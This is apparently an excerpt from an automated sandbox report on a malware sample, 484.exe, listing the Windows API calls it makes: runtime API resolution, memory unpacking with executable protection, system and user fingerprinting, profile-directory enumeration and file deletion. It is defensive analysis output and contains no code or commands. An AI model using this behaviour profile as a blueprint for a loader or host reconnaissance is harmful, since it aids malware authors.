    • Snapshot File: hcaresult_10_2_170000_484.jbxd
    APIs
    • LoadLibraryA.KERNEL32(winscard.dll), ref: 0041E665
    • GetProcAddress.KERNEL32(?,SCardDisconnect), ref: 0041E6BA
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
      • Part of subcall function 001702B2: RtlExitUserThread.NTDLL(00000000), ref: 001701D1
      • Part of subcall function 001702B2: GetProcAddress.KERNEL32(?,LoadLibraryA,00000000), ref: 001702D6
      • Part of subcall function 001702B2: LoadLibraryA.KERNEL32(advapi32.dll), ref: 001702E9
      • Part of subcall function 001702B2: LoadLibraryA.KERNEL32(user32.dll), ref: 00170301
      • Part of subcall function 001702B2: GetProcAddress.KERNEL32(?,VirtualAlloc), ref: 0017031C
      • Part of subcall function 001702B2: GetProcAddress.KERNEL32(?,VirtualProtect), ref: 0017033A
      • Part of subcall function 001702B2: GetProcAddress.KERNEL32(?,VirtualFree), ref: 00170358
      • Part of subcall function 001702B2: GetProcAddress.KERNEL32(?,ExitThread), ref: 00170376
      • Part of subcall function 001702B2: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 00170394
      • Part of subcall function 001702B2: GetProcAddress.KERNEL32(?,RegQueryValueExA), ref: 001703B2
      • Part of subcall function 001702B2: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 001703D0
      • Part of subcall function 001702B2: GetProcAddress.KERNEL32(?,GetSystemWindowsDirectoryA), ref: 001703EE
      • Part of subcall function 001702B2: GetProcAddress.KERNEL32(?,GetVolumeInformationA), ref: 0017040C
      • Part of subcall function 001702B2: GetProcAddress.KERNEL32(?,GetUserNameA), ref: 0017042A
      • Part of subcall function 001702B2: GetProcAddress.KERNEL32(?,CharUpperBuffA), ref: 00170448
    • GetModuleHandleExW.KERNEL32(00000004,?,?), ref: 0017002D
    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0017005B
    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 001700B2
    • VirtualFree.KERNEL32(?,00000000,00008000,?,?), ref: 001700D8
    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 001700FE
    • VirtualProtect.KERNELBASE(?,?,00000002,?,?,?,00000000,?), ref: 00170139
    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?), ref: 0017017D
      • Part of subcall function 0017020E: LoadLibraryA.KERNEL32(?), ref: 0017022E
      • Part of subcall function 0017020E: GetProcAddress.KERNEL32(?,?), ref: 00170269
    Memory Dump Source
    • Source File: 0000000A.00000002.2114485146.00170000.00000040.sdmp, Offset: 00170000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_170000_484.jbxd
    APIs
    • GetStartupInfoW.KERNEL32(?,00435720,00000058), ref: 0041F251
    • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000), ref: 0041F266
      • Part of subcall function 00421738: HeapCreate.KERNELBASE(00000000,00001000,00000000,0041F2BA), ref: 00421741
      • Part of subcall function 004215BD: GetModuleHandleW.KERNEL32(00434124,?,0041F2CB), ref: 004215C5
      • Part of subcall function 004215BD: TlsAlloc.KERNEL32(?,0041F2CB), ref: 0042165E
      • Part of subcall function 004215BD: GetCurrentThreadId.KERNEL32(?,0041F2CB), ref: 0042171D
    • __RTC_Initialize.LIBCMT ref: 0041F2D7
      • Part of subcall function 00420F29: GetStartupInfoW.KERNEL32(?), ref: 00420F36
      • Part of subcall function 00420F29: GetFileType.KERNEL32(?), ref: 00421069
      • Part of subcall function 00420F29: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 0042109F
      • Part of subcall function 00420F29: GetStdHandle.KERNEL32(-000000F6), ref: 004210F3
      • Part of subcall function 00420F29: GetFileType.KERNEL32(00000000), ref: 00421105
      • Part of subcall function 00420F29: InitializeCriticalSectionAndSpinCount.KERNEL32(-004367F4,00000FA0), ref: 00421133
      • Part of subcall function 00420F29: SetHandleCount.KERNEL32 ref: 0042115C
    • __amsg_exit.LIBCMT ref: 0041F2EA
    • GetCommandLineW.KERNEL32 ref: 0041F2F0
      • Part of subcall function 00420ED1: GetEnvironmentStringsW.KERNEL32(00000000,0041F300), ref: 00420ED4
      • Part of subcall function 00420ED1: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00420F10
      • Part of subcall function 00420E23: GetModuleFileNameW.KERNEL32(00000000,C:\Users\LUKETA~1\AppData\Local\Temp\484.exe,00000104), ref: 00420E43
      • Part of subcall function 00420E23: _wparse_cmdline.LIBCMT ref: 00420E6D
      • Part of subcall function 00420E23: _wparse_cmdline.LIBCMT ref: 00420EAF
    • __amsg_exit.LIBCMT ref: 0041F310
      • Part of subcall function 00420BE2: _wcslen.LIBCMT ref: 00420C02
      • Part of subcall function 00420BE2: _wcslen.LIBCMT ref: 00420C3A
    • __amsg_exit.LIBCMT ref: 0041F321
      • Part of subcall function 004205BF: __initterm_e.LIBCMT ref: 004205F5
    • __amsg_exit.LIBCMT ref: 0041F334
    Memory Dump Source
    • Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_41f000_484.jbxd
    APIs
    • GetStartupInfoW.KERNEL32(?), ref: 00420F36
      • Part of subcall function 00424C85: Sleep.KERNEL32(00000000), ref: 00424CAD
    • GetFileType.KERNEL32(?), ref: 00421069
    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 0042109F
    • GetStdHandle.KERNEL32(-000000F6), ref: 004210F3
    • GetFileType.KERNEL32(00000000), ref: 00421105
    • InitializeCriticalSectionAndSpinCount.KERNEL32(-004367F4,00000FA0), ref: 00421133
    • SetHandleCount.KERNEL32 ref: 0042115C
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • GetStartupInfoW.KERNEL32(?), ref: 00420F36
      • Part of subcall function 00424C85: Sleep.KERNEL32(00000000), ref: 00424CAD
    • GetFileType.KERNEL32(?), ref: 00421069
    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 0042109F
    • GetStdHandle.KERNEL32(-000000F6), ref: 004210F3
    • GetFileType.KERNEL32(00000000), ref: 00421105
    • InitializeCriticalSectionAndSpinCount.KERNEL32(-004367F4,00000FA0), ref: 00421133
    • SetHandleCount.KERNEL32 ref: 0042115C
    Memory Dump Source
    • Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_41f000_484.jbxd
    APIs
    • RegQueryValueExA.KERNEL32(00000000,0017068E,00000000,00000007,?,00000400,?,?,00170000), ref: 001706A6
    • RegCloseKey.ADVAPI32(00000000,?,?,00170000), ref: 001706E7
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114485146.00170000.00000040.sdmp, Offset: 00170000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_170000_484.jbxd
    APIs
    • VirtualAlloc.KERNELBASE(00000000,000009E2,00003000,00000001), ref: 0041DE24
      • Part of subcall function 0041DDA0: GetVersionExA.KERNEL32(?), ref: 0041DDB0
      • Part of subcall function 0041DD60: GetVersionExA.KERNEL32(?), ref: 0041DD70
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • SHDeleteValueW.SHLWAPI(00000000,00000000,00000000), ref: 0041E938
      • Part of subcall function 0041E4F0: LoadLibraryA.KERNEL32(winscard.dll), ref: 0041E665
      • Part of subcall function 0041E4F0: GetProcAddress.KERNEL32(?,SCardDisconnect), ref: 0041E6BA
      • Part of subcall function 0041E460: GetCurrentThread.KERNEL32 ref: 0041E492
      • Part of subcall function 0041E1E0: GetVersionExA.KERNEL32(?), ref: 0041E26D
      • Part of subcall function 0041E1E0: GetCurrentThread.KERNEL32 ref: 0041E273
      • Part of subcall function 0041E1E0: Sleep.KERNELBASE(00007918), ref: 0041E2B3
      • Part of subcall function 0041E1E0: GetVersionExA.KERNEL32(?), ref: 0041E34E
      • Part of subcall function 0041E1E0: GetCurrentThread.KERNEL32 ref: 0041E41F
      • Part of subcall function 0041E1E0: GetCurrentThread.KERNEL32 ref: 0041E425
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • GetSystemWindowsDirectoryA.KERNEL32(?,00000400), ref: 00170712
    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000007,00000000,00000000,00000000,00000000), ref: 0017073A
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114485146.00170000.00000040.sdmp, Offset: 00170000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_170000_484.jbxd
    APIs
    • InitializeCriticalSectionAndSpinCount.KERNELBASE(?,00000FA0), ref: 00423D49
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • InitializeCriticalSectionAndSpinCount.KERNELBASE(?,00000FA0), ref: 00423D49
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_41f000_484.jbxd
    APIs
    • _wcslen.LIBCMT ref: 00420C02
      • Part of subcall function 00424C85: Sleep.KERNEL32(00000000), ref: 00424CAD
    • _wcslen.LIBCMT ref: 00420C3A
      • Part of subcall function 00424BCB: HeapFree.KERNEL32(00000000,00000000), ref: 00424BE1
      • Part of subcall function 00424BCB: GetLastError.KERNEL32(00000000,?,004213EB,00000000,?,0042085F,00000003), ref: 00424BF3
      • Part of subcall function 00422624: GetCurrentProcess.KERNEL32(C0000417), ref: 0042263A
      • Part of subcall function 00422624: TerminateProcess.KERNEL32(00000000), ref: 00422641
    Memory Dump Source
    • Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_41f000_484.jbxd
    APIs
    • LoadLibraryA.KERNEL32(?), ref: 0017022E
    • GetProcAddress.KERNEL32(?,?), ref: 00170269
    Memory Dump Source
    • Source File: 0000000A.00000002.2114485146.00170000.00000040.sdmp, Offset: 00170000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_170000_484.jbxd
    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00424C9B,00000000,?,00000000,00000000,00000000,?,004213AC,00000001,00000214,?,00000000), ref: 0042BC25
      • Part of subcall function 004246EF: DecodePointer.KERNEL32(?,0042BC3E,?,00000000,?,00424C9B,00000000,?,00000000,00000000,00000000,?,004213AC,00000001,00000214), ref: 004246FA
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 0042BC25
      • Part of subcall function 004246EF: RtlDecodePointer.NTDLL ref: 004246FA
    Memory Dump Source
    • Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_41f000_484.jbxd
    APIs
    • HeapCreate.KERNELBASE(00000000,00001000,00000000,0041F2BA), ref: 00421741
    Memory Dump Source
    • Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_41f000_484.jbxd
    APIs
    • TerminateProcess.KERNELBASE(000000FF,?), ref: 001702A8
    Memory Dump Source
    • Source File: 0000000A.00000002.2114485146.00170000.00000040.sdmp, Offset: 00170000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_170000_484.jbxd
    APIs
      • Part of subcall function 0042BBE2: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00424C9B,00000000,?,00000000,00000000,00000000,?,004213AC,00000001,00000214,?,00000000), ref: 0042BC25
    • Sleep.KERNEL32(00000000), ref: 00424CAD
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
      • Part of subcall function 0042BBE2: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 0042BC25
    • Sleep.KERNEL32(00000000), ref: 00424CAD
    Memory Dump Source
    • Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_41f000_484.jbxd

    Non-executed Functions

    APIs
      • Part of subcall function 0040A7D8: GetProcessHeap.KERNEL32(00000008,0000000C,?,7142434B,001CFDA8), ref: 0040A845
      • Part of subcall function 0040A7D8: HeapAlloc.KERNEL32(00000000), ref: 0040A84C
      • Part of subcall function 0040A7D8: GetMessageExtraInfo.USER32 ref: 0040A868
      • Part of subcall function 0040A7D8: GetProcessHeap.KERNEL32(00000008,00000016), ref: 0040A8CF
      • Part of subcall function 0040A7D8: HeapAlloc.KERNEL32(00000000), ref: 0040A8D6
      • Part of subcall function 0040A7D8: GetDoubleClickTime.USER32 ref: 0040A8EA
      • Part of subcall function 0040A7D8: LoadLibraryA.KERNEL32(?), ref: 0040A914
      • Part of subcall function 0040A7D8: GetProcAddress.KERNEL32(00000000), ref: 0040A91B
      • Part of subcall function 0040A7D8: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040A94F
      • Part of subcall function 0040A7D8: HeapFree.KERNEL32(00000000), ref: 0040A95C
      • Part of subcall function 0040A7D8: GetProcessHeap.KERNEL32(00000000,?), ref: 0040A961
      • Part of subcall function 0040A7D8: HeapFree.KERNEL32(00000000), ref: 0040A968
    • GetProcessHeap.KERNEL32(00000008,0000000D,?,7142434B,001CFDA8), ref: 0040A9CF
    • HeapAlloc.KERNEL32(00000000), ref: 0040A9D2
    • GetCapture.USER32 ref: 0040A9F3
    • GetModuleHandleA.KERNEL32(00000000), ref: 0040AA19
    • GetProcessHeap.KERNEL32(00000008,0000000D), ref: 0040AA54
    • HeapAlloc.KERNEL32(00000000), ref: 0040AA57
    • GetOpenClipboardWindow.USER32 ref: 0040AA75
    • GetModuleHandleA.KERNEL32(00000000), ref: 0040AA9B
    • GetUserNameA.ADVAPI32(0041CDF0,?), ref: 0040AAC6
    • GetProcessHeap.KERNEL32(00000008,0000000D), ref: 0040AAF9
    • HeapAlloc.KERNEL32(00000000), ref: 0040AAFC
    • GetClipboardViewer.USER32 ref: 0040AB16
    • lstrcmpA.KERNEL32(0041CDF0,00000000), ref: 0040AB41
    • GetProcessHeap.KERNEL32(00000008,00000009), ref: 0040AB78
    • HeapAlloc.KERNEL32(00000000), ref: 0040AB7B
    • GetFocus.USER32 ref: 0040AB95
    • lstrcmpA.KERNEL32(0041CDF0,00000000), ref: 0040ABC1
    • GetComputerNameA.KERNEL32(0041CDF0,00000400), ref: 0040ABE8
    • GetProcessHeap.KERNEL32(00000008,00000009), ref: 0040AC16
    • HeapAlloc.KERNEL32(00000000), ref: 0040AC19
    • GetCursor.USER32 ref: 0040AC30
    • lstrcmpA.KERNEL32(0041CDF0,00000000), ref: 0040AC5B
    • GetProcessHeap.KERNEL32(00000008,00000009), ref: 0040AC8D
    • HeapAlloc.KERNEL32(00000000), ref: 0040AC90
    • GetMenuCheckMarkDimensions.USER32 ref: 0040ACA7
    • lstrcmpA.KERNEL32(0041CDF0,00000000), ref: 0040ACD2
    • GetProcessHeap.KERNEL32(00000008,0000001D), ref: 0040AD36
    • HeapAlloc.KERNEL32(00000000), ref: 0040AD39
    • GetMessageExtraInfo.USER32 ref: 0040AD53
    • GetProcessHeap.KERNEL32(00000008,00000013), ref: 0040ADB1
    • HeapAlloc.KERNEL32(00000000), ref: 0040ADB4
    • GetClipboardOwner.USER32 ref: 0040ADCE
      • Part of subcall function 0040A77C: RegCreateKeyA.ADVAPI32(80000002,?,?), ref: 0040A795
      • Part of subcall function 0040A77C: RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000001,0041CDF0,?), ref: 0040A7BF
      • Part of subcall function 0040A77C: RegCloseKey.ADVAPI32(?), ref: 0040A7C8
    • GetProcessHeap.KERNEL32(00000008,00000006), ref: 0040AE2F
    • HeapAlloc.KERNEL32(00000000), ref: 0040AE32
    • GetLastError.KERNEL32 ref: 0040AE4F
    • GetProcessHeap.KERNEL32(00000008,00000007), ref: 0040AE98
    • HeapAlloc.KERNEL32(00000000), ref: 0040AE9B
    • CountClipboardFormats.USER32 ref: 0040AEB8
    • GetProcessHeap.KERNEL32(00000008,00000006), ref: 0040AEFE
    • HeapAlloc.KERNEL32(00000000), ref: 0040AF01
    • GetFocus.USER32 ref: 0040AF1E
    • GetProcessHeap.KERNEL32(00000008,00000006), ref: 0040AF69
    • HeapAlloc.KERNEL32(00000000), ref: 0040AF6C
    • GetMessageExtraInfo.USER32 ref: 0040AF89
    • GetProcessHeap.KERNEL32(00000008,00000006), ref: 0040AFD4
    • HeapAlloc.KERNEL32(00000000), ref: 0040AFD7
    • GetForegroundWindow.USER32 ref: 0040AFF4
    • GetProcessHeap.KERNEL32(00000008,00000012), ref: 0040B052
    • HeapAlloc.KERNEL32(00000000), ref: 0040B055
    • GetProcessWindowStation.USER32 ref: 0040B072
    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 0040B0BD
    • HeapAlloc.KERNEL32(00000000), ref: 0040B0C0
    • GetModuleHandleW.KERNEL32(00000000), ref: 0040B0DC
    • GetProcessHeap.KERNEL32(00000008,00000006), ref: 0040B125
    • HeapAlloc.KERNEL32(00000000), ref: 0040B128
    • GetCapture.USER32 ref: 0040B13F
    • StrStrA.SHLWAPI(0041CDF0,00000000), ref: 0040B1CD
    • GetProcessHeap.KERNEL32(00000008,00000012), ref: 0040B213
    • HeapAlloc.KERNEL32(00000000), ref: 0040B216
    • IsSystemResumeAutomatic.KERNEL32 ref: 0040B22D
    • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 0040B29D
    • HeapAlloc.KERNEL32(00000000), ref: 0040B2A0
    • GetCurrentThreadId.KERNEL32 ref: 0040B2B7
    • StrStrA.SHLWAPI(0041CDF0,00000000), ref: 0040B2E2
    • GetProcessHeap.KERNEL32(00000008,0000002B), ref: 0040B363
    • HeapAlloc.KERNEL32(00000000), ref: 0040B366
    • GetClipboardSequenceNumber.USER32 ref: 0040B380
    • GetProcessHeap.KERNEL32(00000008,00000019), ref: 0040B40D
    • HeapAlloc.KERNEL32(00000000), ref: 0040B410
    • ReleaseCapture.USER32 ref: 0040B427
    • StrStrA.SHLWAPI(0041CDF0,00000000), ref: 0040B452
    • GetProcessHeap.KERNEL32(00000008,00000019), ref: 0040B4B4
    • HeapAlloc.KERNEL32(00000000), ref: 0040B4B7
    • GetProcessWindowStation.USER32 ref: 0040B4CE
    • StrStrA.SHLWAPI(0041CDF0,00000000), ref: 0040B4F9
    • GetProcessHeap.KERNEL32(00000008,00000019), ref: 0040B552
    • HeapAlloc.KERNEL32(00000000), ref: 0040B555
    • GetMenuCheckMarkDimensions.USER32 ref: 0040B569
    • StrStrA.SHLWAPI(0041CDF0,00000000), ref: 0040B594
      • Part of subcall function 0040A973: Sleep.KERNEL32(00002710), ref: 0040A97A
      • Part of subcall function 0040A973: GetTickCount.KERNEL32(0040B5AC), ref: 0040A980
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040B5AF
    • HeapFree.KERNEL32(00000000), ref: 0040B5B8
    • GetProcessHeap.KERNEL32(00000000,00000005), ref: 0040B5BD
    • HeapFree.KERNEL32(00000000), ref: 0040B5C0
    • GetProcessHeap.KERNEL32(00000000,706B7358), ref: 0040B5C7
    • HeapFree.KERNEL32(00000000), ref: 0040B5CA
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040B5D4
    • HeapFree.KERNEL32(00000000), ref: 0040B5D7
    • GetProcessHeap.KERNEL32(00000000,39635538), ref: 0040B5DE
    • HeapFree.KERNEL32(00000000), ref: 0040B5E1
    • GetProcessHeap.KERNEL32(00000000,7D0C1C30), ref: 0040B5E8
    • HeapFree.KERNEL32(00000000), ref: 0040B5EB
    • GetProcessHeap.KERNEL32(00000000,48496F7A), ref: 0040B5F2
    • HeapFree.KERNEL32(00000000), ref: 0040B5F5
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040B5FF
    • HeapFree.KERNEL32(00000000), ref: 0040B602
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040B60C
    • HeapFree.KERNEL32(00000000), ref: 0040B60F
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040B619
    • HeapFree.KERNEL32(00000000), ref: 0040B61C
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040B626
    • HeapFree.KERNEL32(00000000), ref: 0040B629
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040B633
    • HeapFree.KERNEL32(00000000), ref: 0040B636
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040B640
    • HeapFree.KERNEL32(00000000), ref: 0040B643
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040B64D
    • HeapFree.KERNEL32(00000000), ref: 0040B650
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040B657
    • HeapFree.KERNEL32(00000000), ref: 0040B65A
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040B664
    • HeapFree.KERNEL32(00000000), ref: 0040B667
    • GetProcessHeap.KERNEL32(00000000,371D0123), ref: 0040B66E
    • HeapFree.KERNEL32(00000000), ref: 0040B671
    • GetProcessHeap.KERNEL32(00000000,4F1D1F21), ref: 0040B678
    • HeapFree.KERNEL32(00000000), ref: 0040B67B
    • GetProcessHeap.KERNEL32(00000000,63784E47), ref: 0040B682
    • HeapFree.KERNEL32(00000000), ref: 0040B685
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040B68F
    • HeapFree.KERNEL32(00000000), ref: 0040B692
    • GetProcessHeap.KERNEL32(00000000,77584575), ref: 0040B699
    • HeapFree.KERNEL32(00000000), ref: 0040B69C
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040B6A6
    • HeapFree.KERNEL32(00000000), ref: 0040B6A9
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProfilesDirectoryW.USERENV(00000000,?), ref: 0040230B
    • GetProcessHeap.KERNEL32(00000008,?), ref: 00402329
    • HeapAlloc.KERNEL32(00000000), ref: 0040232C
    • GetProcessHeap.KERNEL32(00000008,?), ref: 0040233F
    • HeapAlloc.KERNEL32(00000000), ref: 00402342
    • GetProcessHeap.KERNEL32(00000008,00000208), ref: 0040235A
    • HeapAlloc.KERNEL32(00000000), ref: 0040235D
    • GetProfilesDirectoryW.USERENV(?,?), ref: 004023A2
    • GetProcessHeap.KERNEL32(00000008,00000015), ref: 004023E7
    • HeapAlloc.KERNEL32(00000000), ref: 004023EA
    • GetOpenClipboardWindow.USER32 ref: 0040240A
    • FindFirstFileW.KERNEL32(?,?), ref: 00402470
    • GetProcessHeap.KERNEL32(00000008,00000009), ref: 004024BE
    • HeapAlloc.KERNEL32(00000000), ref: 004024C1
    • GetCommandLineA.KERNEL32 ref: 004024DD
    • GetProcessHeap.KERNEL32(00000008,0000000D), ref: 0040250C
    • HeapAlloc.KERNEL32(00000000), ref: 0040250F
    • GetForegroundWindow.USER32 ref: 0040252B
    • lstrcmpW.KERNEL32(?,?), ref: 00402560
    • lstrcmpW.KERNEL32(?,00000000), ref: 0040257C
    • GetProcessHeap.KERNEL32(00000008,00000051), ref: 004025F4
    • HeapAlloc.KERNEL32(00000000), ref: 004025F7
    • GetCurrentProcessId.KERNEL32 ref: 00402610
    • GetProcessHeap.KERNEL32(00000008,0000004D), ref: 004026C7
    • HeapAlloc.KERNEL32(00000000), ref: 004026CA
    • GetCurrentProcessId.KERNEL32 ref: 004026E9
    • GetProcessHeap.KERNEL32(00000008,00000061), ref: 00402788
    • HeapAlloc.KERNEL32(00000000), ref: 0040278B
    • GetMenuCheckMarkDimensions.USER32 ref: 004027A4
    • wsprintfW.USER32 ref: 004027E3
    • GetFileAttributesW.KERNEL32(?), ref: 004027ED
      • Part of subcall function 0040E0AE: DeleteFileW.KERNEL32(?,?,00000000,76E6FE8D,00402806), ref: 0040E0C2
      • Part of subcall function 0040E0AE: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040E0DC
      • Part of subcall function 0040E0AE: HeapFree.KERNEL32(00000000), ref: 0040E0E3
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402814
    • HeapFree.KERNEL32(00000000), ref: 0040281D
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00402839
    • HeapFree.KERNEL32(00000000), ref: 0040283C
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00402844
    • HeapFree.KERNEL32(00000000), ref: 00402847
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402859
    • HeapFree.KERNEL32(00000000), ref: 0040285C
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00402866
    • HeapFree.KERNEL32(00000000), ref: 00402869
    • FindNextFileW.KERNEL32(?,?), ref: 00402879
    • FindClose.KERNEL32(00000000), ref: 0040288B
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040289A
    • HeapFree.KERNEL32(00000000), ref: 0040289D
    • GetProcessHeap.KERNEL32(00000000,?), ref: 004028B1
    • HeapFree.KERNEL32(00000000), ref: 004028B4
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004028C2
    • HeapFree.KERNEL32(00000000), ref: 004028C5
    • GetProcessHeap.KERNEL32(00000000,?), ref: 004028D6
    • HeapFree.KERNEL32(00000000), ref: 004028D9
    Strings
